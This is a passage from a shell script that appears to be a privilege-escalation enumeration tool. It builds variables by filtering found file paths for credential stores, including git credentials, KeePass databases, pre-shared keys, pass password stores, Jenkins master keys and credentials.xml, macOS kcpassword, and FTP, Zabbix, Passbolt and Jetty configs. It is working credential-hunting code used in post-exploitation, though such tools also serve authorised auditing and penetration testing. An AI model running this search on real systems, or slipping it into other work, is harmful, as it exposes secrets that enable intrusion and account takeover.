"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.msmtprc$" | sort | uniq | head -n 70) PSTORAGE_INFLUXDB=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "influxdb\.conf$" | sort | uniq | head -n 70) PSTORAGE_ZABBIX=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq |
head -n 70) PSTORAGE_GITHUB=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq |
head -n 70) PSTORAGE_SVN=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.svn$" | sort | uniq | head -n 70) PSTORAGE_KEEPASS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" |
sort | uniq | head -n 70) PSTORAGE_PRE_SHARED_KEYS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.psk$" | sort | uniq | head -n 70)
PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.password-store$" | sort | uniq | head -n 70) PSTORAGE_FTP=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"vsftpd\.conf$|.*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$"
| sort | uniq | head -n 70) PSTORAGE_SAMBA=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "smb\.conf$" | sort | uniq | head -n 70) PSTORAGE_DNS=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}usr" | grep -E
"bind$" | sort | uniq | head -n 70) PSTORAGE_SEEDDMS=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "seeddms.*$" | sort | uniq | head -n 70) PSTORAGE_DDCLIENT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "ddclient\.conf$" | sort | uniq | head -n 70)
PSTORAGE_KCPASSWORD=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "kcpassword$" | sort | uniq | head -n 70) PSTORAGE_SENTRY=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70)
PSTORAGE_STRAPI=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "environments$" | sort | uniq | head -n 70) PSTORAGE_CACTI=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "cacti$" | sort | uniq | head -n 70) PSTORAGE_ROUNDCUBE=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "roundcube$" | sort | uniq | head -n 70) PSTORAGE_PASSBOLT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "passbolt\.php$" | sort | uniq | head -n 70) PSTORAGE_JETTY=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70)
PSTORAGE_JENKINS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"master\.key$|hudson\.util\.Secret$|credentials\.xml$|config\.xml$|.*jenkins$" |
sort | uniq | head -n 70) PSTORAGE_WGET=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.wgetrc$" | sort | uniq | head -n 70)
PSTORAGE_INTERESTING_LOGS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
